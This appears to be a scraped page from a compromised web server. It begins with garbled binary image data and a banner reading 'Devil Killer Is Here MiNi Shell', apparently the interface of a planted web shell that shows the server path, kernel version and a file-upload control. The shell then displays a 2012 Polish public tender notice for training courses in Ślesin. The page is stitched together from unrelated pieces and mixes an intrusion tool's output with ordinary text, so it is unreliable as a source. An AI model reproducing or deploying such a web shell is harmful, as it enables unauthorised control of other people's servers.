JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120810/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120810/173833-N-2012.html

<p class="kh_header"><b>Ślesin: Przygotowanie i przeprowadzenie szkoleń i kursów zawodowych                                  w ramach projektu PO KL Priorytet VII, Działanie 7.1. Podziałanie 7.1.1                     w ramach projektu Klucz do sukcesu</b><br>
<b>Numer ogłoszenia: 173833 - 2012; data zamieszczenia: 10.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejsko-Gminny Ośrodek Pomocy Społecznej , ul. Kleczewska 15, 62-561 Ślesin, woj. wielkopolskie, tel. 63 2704087, faks 63 2704196.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przygotowanie i przeprowadzenie szkoleń i kursów zawodowych                                  w ramach projektu PO KL Priorytet VII, Działanie 7.1. Podziałanie 7.1.1                     w ramach projektu Klucz do sukcesu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest przygotowanie i przeprowadzenie szkoleń i kursów przewidzianych 
w projekcie /Klucz do sukcesu/ w Gminie Ślesin realizowanym w ramach Programu Operacyjnego Kapitał ludzki, współfinansowanego ze środków Europejskiego Funduszu Społecznego.
Szkoleniom poddanych zostanie łącznie 20 osób mieszkańców gminy Ślesin, bezrobotnych, nieaktywnych zawodowo, zagrożonych wykluczeniem społecznym i korzystających ze świadczeń pomocy społecznej w rozumieniu ustawy o pomocy społecznej. Proces aktywnej integracji wymienionych osób odbywać się będzie poprzez uczestnictwo w następujących szkoleniach, będących przedmiotem zamówienia.

2.  Szkolenie obejmuje następujący zakres tematyczny: 

DORADZTWO ZAWODOWE

1. Termin przeprowadzenia warsztatu: wrzesień 2012 r. (dokładny termin zostanie ustalony                              z Wykonawcą po podpisaniu umowy).
2. Ilość osób:  20 .
3. Ilość godzin:  16 h (dwa dni).
4. Tematyka: warsztat motywacyjno-integracyjny mający na celu:
-	Zapoznanie się z rynkiem pracy
-	Predyspozycje na rynku pracy
-	Przygotowanie do rozmowy z pracodawcą

5. Miejsce realizacji: w Ślesinie - zapewnia Zamawiający. 
6. Zajęcia nie powinny zaczynać się wcześniej niż od godz. 8:00 i kończyć nie później niż o godz. 17:00 Szkolenie nie może przekroczyć 8 godzin zegarowych dziennie (za godzinę zegarową uznaje się zajęcia edukacyjne liczące 45 minut oraz przerwę liczącą średnio 15 minut).
7. Wykonawca najpóźniej 2 dni przed rozpoczęciem szkolenia zobowiązuje się dostarczyć Zamawiającemu harmonogram zajęć zawierający: m.in.: datę, godzinę rozpoczęcia i zakończenia zajęć danego dnia, imię i nazwisko osoby prowadzącej zajęcia, tematykę zajęć oraz liczbę godzin zaplanowanych na dany dzień szkolenia. W przypadku zmian w harmonogramie Wykonawca zobowiązuje się do natychmiastowego powiadomienia Zamawiającego o takich zmianach na piśmie.      

POMOC DLA OFIAR PRZEMOCY

1. Termin przeprowadzenia warsztatu: wrześień 2012 r. (dokładny termin zostanie ustalony                            z Wykonawcą po podpisaniu umowy).
2. Ilość osób:  10 
3. Ilość godzin:  30 h 
     -  10 h (2 dni po 5 godzin/dziennie) - zajęcia grupowe 
     -  20 h - indywidualne zajęcia.
(za godzinę zegarową uznaje się zajęcia edukacyjne liczące 45 minut oraz przerwę liczącą średnio 15 minut).
4. Tematyka: warsztat motywacyjno-integracyjny mający na celu:
-		Pomoc psychologiczna dorosłym ofiarom przemocy w rodzinie
-		Dziecko krzywdzone - diagnoza oraz formy pomocy
-		Psychologia kryzysu i traumy. Interwencja kryzysowa.
5. Miejsce realizacji: w Ślesinie - zapewnia Zamawiający. 
6. Zajęcia nie powinny zaczynać się wcześniej niż od godz. 8:00 i kończyć nie później niż o godz. 17:00 
7. Wykonawca najpóźniej 2 dni przed rozpoczęciem szkolenia zobowiązuje się dostarczyć Zamawiającemu harmonogram zajęć zawierający: m.in.: datę, godzinę rozpoczęcia i zakończenia zajęć danego dnia, imię i nazwisko osoby prowadzącej zajęcia, tematykę zajęć oraz liczbę godzin zaplanowanych na dany dzień szkolenia. W przypadku zmian w harmonogramie Wykonawca zobowiązuje się do natychmiastowego powiadomienia Zamawiającego o takich zmianach na piśmie.      
8. Kurs zostanie przeprowadzony przez psychologa z doświadczeniem w przeprowadzaniu warsztatów, treningów i szkoleń.

TRENING UMIEJĘTNOŚCI INTERPERSONALNYCH

1. Termin przeprowadzenia warsztatu: wrzesień 2012 r. (dokładny termin zostanie ustalony                             Wykonawcą po podpisaniu umowy).
2. Ilość osób:  20 .
3. Ilość godzin:  16 h (dwa dni).
4. Tematyka: warsztat motywacyjno-integracyjny mający na celu:
-		Komunikacja interpersonalna
-		Autoprezentacja
-		Asertywność
-		Trening umiejętności komunikacyjnych, asertywności, radzenia sobie ze stresem
5. Miejsce realizacji: w Ślesinie - zapewnia Zamawiający. 
6. Zajęcia nie powinny zaczynać się wcześniej niż od godz. 8:00 i kończyć nie później niż o godz. 17:00 Szkolenie nie może przekroczyć 8 godzin zegarowych dziennie (za godzinę zegarową uznaje się zajęcia edukacyjne liczące 45 minut oraz przerwę liczącą średnio 15 minut).
7. Wykonawca najpóźniej 2 dni przed rozpoczęciem szkolenia zobowiązuje się dostarczyć Zamawiającemu harmonogram zajęć zawierający: m.in.: datę, godzinę rozpoczęcia i zakończenia zajęć danego dnia, imię i nazwisko osoby prowadzącej zajęcia, tematykę zajęć oraz liczbę godzin zaplanowanych na dany dzień szkolenia. W przypadku zmian w harmonogramie Wykonawca zobowiązuje się do natychmiastowego powiadomienia Zamawiającego o takich zmianach na piśmie.      
8. Kurs zostanie przeprowadzony przez psychologa z doświadczeniem w przeprowadzaniu warsztatów, treningów i szkoleń.

KOSMETYKA, STYLISTA Z ELEMENTAMI WIZAŻU

1. Termin przeprowadzenia warsztatu: wrzesień 2012 r. (dokładny termin zostanie ustalony                            z Wykonawcą po podpisaniu umowy).
2. Ilość osób:  15 
3. Ilość godzin dydaktycznych:  50 h (10 dni po 5 godzin/dziennie).
(za godzinę zegarową uznaje się zajęcia edukacyjne liczące 45 minut oraz przerwę liczącą średnio 15 minut).
4. Tematyka: warsztat motywacyjno-integracyjny mający na celu:
-	Wiadomości wstępne z anatomią i fizjologią człowieka
-		Pielęgnacja skóry
-		Pielęgnacja oczu
-		Pielęgnacja kończyny górnej
5. Miejsce realizacji: w Ślesinie - zapewnia Zamawiający. 
6. Zajęcia nie powinny zaczynać się wcześniej niż od godz. 8:00 i kończyć nie później niż o godz. 17:00 
7. Wykonawca najpóźniej 2 dni przed rozpoczęciem szkolenia zobowiązuje się dostarczyć Zamawiającemu harmonogram zajęć zawierający: m.in.: datę, godzinę rozpoczęcia i zakończenia zajęć danego dnia, imię i nazwisko osoby prowadzącej zajęcia, tematykę zajęć oraz liczbę godzin zaplanowanych na dany dzień szkolenia. W przypadku zmian w harmonogramie Wykonawca zobowiązuje się do natychmiastowego powiadomienia Zamawiającego o takich zmianach na piśmie.      


KURS TWORZENIA BIŻUTERII ARTYSTYCZNEJ
1. Termin przeprowadzenia warsztatu: październik 2012 r. (dokładny termin zostanie ustalony z Wykonawcą po podpisaniu umowy).
2. Ilość osób:  16 .
3. Ilość godzin dydaktycznych:  30 h ( 5 dni po 6 godzin/dziennie) 
(za godzinę zegarową uznaje się zajęcia edukacyjne liczące 45 minut oraz przerwę liczącą średnio 15 minut).
4. Tematyka: warsztat motywacyjno-integracyjny mający na celu:
-	Zapoznanie z podstawowymi materiałami, narzędziami i akcesoriami jubilerskimi,
-	Tworzenie biżuterii:
    a)  projekt i wykonanie kolczyków z gotowych elementów 
     b)  projekt i wykonanie naszyjnika, bransoletki z zastosowaniem 
    c)  typy zakończeń i zapięć
    d) porady, tajniki i ciekawostki
-	Podsumowanie zajęć :
                        a) uczestnicy I stopnia wtajemniczenia nabywają umiejętność samodzielnego 
                            tworzenia, projektowania i wykonanie prostych kolczyków, naszyjników 
                            i bransoletek.
5. Miejsce realizacji: w Ślesinie - zapewnia Zamawiający. 
6. Zajęcia nie powinny zaczynać się wcześniej niż od godz. 8:00 i kończyć nie później niż o godz. 17:00 
7. Wykonawca najpóźniej 2 dni przed rozpoczęciem szkolenia zobowiązuje się dostarczyć Zamawiającemu harmonogram zajęć zawierający: m.in.: datę, godzinę rozpoczęcia i zakończenia zajęć danego dnia, imię i nazwisko osoby prowadzącej zajęcia, tematykę zajęć oraz liczbę godzin zaplanowanych na dany dzień szkolenia. W przypadku zmian w harmonogramie Wykonawca zobowiązuje się do natychmiastowego powiadomienia Zamawiającego o takich zmianach na piśmie.      

KURS KOMPUTEROWY (PODSTAWOWY)

1. Termin przeprowadzenia warsztatu: listopad 2012 r. (dokładny termin zostanie ustalony                            z Wykonawcą po podpisaniu umowy).
2. Ilość osób:  11 .
3. Ilość godzin dydaktycznych:  30 h (pięć dni po 6 h/dziennie)
(za godzinę zegarową uznaje się zajęcia edukacyjne liczące 45 minut oraz przerwę liczącą średnio 15 minut).
4. Tematyka: warsztat motywacyjno-integracyjny mający na celu:
-	Podstawowe zagadnienia informatyczne
-	Praca z systemem operacyjnym Windows
-	Praca z programami z grupy /Akcesoria/
-	Edytor tekstu Word
-	Arkusz kalkulacyjny Excel
5. Miejsce realizacji: w Ślesinie - zapewnia Zamawiający.
6. Zajęcia nie powinny zaczynać się wcześniej niż od godz. 8:00 i kończyć nie później niż o godz. 17:00 
7. Wykonawca najpóźniej 2 dni przed rozpoczęciem szkolenia zobowiązuje się dostarczyć Zamawiającemu harmonogram zajęć zawierający: m.in.: datę, godzinę rozpoczęcia i zakończenia zajęć danego dnia, imię i nazwisko osoby prowadzącej zajęcia, tematykę zajęć oraz liczbę godzin zaplanowanych na dany dzień szkolenia. W przypadku zmian w harmonogramie Wykonawca zobowiązuje się do natychmiastowego powiadomienia Zamawiającego o takich zmianach na piśmie.      

Wymagania ogólne stawiane Wykonawcy

1. Wykonawca szkolenia otwartego realizowanego w ramach projektu jest zobowiązany 
do rejestracji instytucji szkoleniowej w internetowej bazie ofert szkoleniowych dostępnych na stronie internetowej www.inwestycjawkadry.pl i aktualizacji w ww. bazie informacji o każdym szkoleniu otwartym w ramach Projektu nie rzadziej niż 1 raz w miesiącu, zgodnie z zakresem danych określonych przez WUP.
2. Wymagana jest należyta staranność, przy realizacji zamówienia oraz zorientowanie na osiągnięcie rezultatu organizowanych zajęć, którym jest rozwój zdolności społeczno -zawodowych Uczestników.
3. Wymagane jest, żeby Wykonawca na bieżąco monitorował osiąganie zakładanych rezultatów a po zakończeniu realizacji zamówienia przedstawił Zabawiającemu raport końcowy.
4. Wykonawca zapewnia: sprzęt dydaktyczny, materiały szkoleniowe dla uczestników, wyżywienie: ciastka, kawa, herbata, zimne napoje (odpowiednia ilość naczyń jednorazowego użytku), ciepły posiłek (drugie danie gorące). Koszty cateringu mają być wliczone w cenę szkolenia.
5. Zajęcia powinny się odbywać codziennie (bez sobót, niedziel oraz dni ustawowo wolnych od pracy ).
6. W sali szkoleniowej należy umieścić logo EFS. 
7. Wykonawca pokrywa koszty ubezpieczenia uczestników szkolenia od następstw nieszczęśliwych wypadków (podczas szkolenia, w drodze na szkolenia i ze szkolenia).
8. Szkolenia mają zakończyć się oceną zdobytych umiejętności oraz wydaniem certyfikatu/zaświadczenia o ukończeniu szkolenia zgodnie z  Rozporządzeniem Ministra Edukacji                                    i Nauki z dnia 3 lutego 2006 r. w sprawie uzyskania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych( Dz. U. z 2006 r. Nr 31 poz.216                  z późniejszymi zmianami).
9. Wydane certyfikaty/ zaświadczenia muszą zawierać logotypy Programu Operacyjnego Kapitał Ludzki oraz informacje, że projekt jest współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego. 
10. Wykonawca po wykonaniu zadania przedstawi Zamawiającemu listy obecności uczestników, program prowadzonych zajęć, dziennik zajęć (wymiar godzin i tematy zajęć), kserokopie rejestru wydanych certyfikatów/ zaświadczeń, ankiety badające poziom zadowolenia i wzrost wiedzy uczestników przeprowadzone na początku i na końcu trwania projektu, opinię na temat każdego uczestnika, raport końcowy obejmujący zarówno całość grupy jak i poszczególnych beneficjentów oraz przeprowadzi ankiety porównawcze (ewaluacyjne) przed i po zakończeniu projektu..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.51.00.00-2, 80.40.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 23.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli Wykonawca będzie posiadał: a) Aktualne zaświadczenie o wpisie instytucji szkoleniowej do rejestru instytucji szkoleniowych prowadzonego przez właściwy ze względu na siedzibę instytucji Wojewódzki Urząd Pracy. b) Certyfikat o dokonaniu wpisu do Rejestru podmiotów prowadzących agencje zatrudnienia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli Wykonawca będzie posiadał: Wykonawca musi posiadać doświadczenie polegające na przeprowadzeniu w ostatnich 3 latach, przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, minimum trzech szkoleń dla co najmniej 10-cio osobowej grupy. Potwierdzenie spełniania warunku posiadania wiedzy i doświadczenia zostanie ocenione przez Zamawiającego na podstawie Załącznika nr 3 do SIWZ, do którego Wykonawca musi dołączyć dokumenty potwierdzające należyte wykonanie tych usług (np. referencje, wraz z określeniem nazwy szkolenia, datami realizacji i ilością przeszkolonych osób).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku Zamawiający dokona na podstawie oświadczenia Wykonawcy o spełnieniu warunków w postępowaniu, o których mowa w art. 22 ust. 1 ustawy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli wykonawca będzie dysponować osobami, które posiadają uprawnienia do wykonania usługi objętej przedmiotem  zamówienia oraz dołączy do oferty wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, z którego będzie wynikało, że Wykonawca dysponuje co najmniej jedną osobą psychologiem, doradcą w jednym i min. z 3 letnim doświadczeniem w prowadzeniu zajęć szkoleniowych. Potwierdzenie spełniania warunku dysponowania osobami zdolnymi do wykonania zamówienia zostanie ocenione przez Zamawiającego na podstawie Załącznika nr 4 do SIWZ.  
Zamawiający będzie oceniać posiadane,  kwalifikacje i liczbę przeprowadzonych szkoleń w zakresie zagadnień będących przedmiotem zamówienia, na podstawie wykazu osób, które będą uczestniczyć              w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnego do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku Zamawiający dokona na podstawie oświadczenia Wykonawcy o spełnieniu warunków w postępowaniu, o których mowa w art. 22 ust. 1 ustawy.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz ofertowy; 2.Oświadczenie o spełnieniu warunku na podst. art 22 ust. 1 ustawy; 3. Zobowiązanie do udostępnienia zasobów przez inne podmioty; 4.Pełnomocnictwo /jeżeli dotyczy/; 5. Wykaz usług powierzonych podwykonawcom; 6. Harmonogram szkolenia; 7. Preliminarz kosztów szkolenia; 8. Projekt umowy; 9. Inne dokumenty wymienione w SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
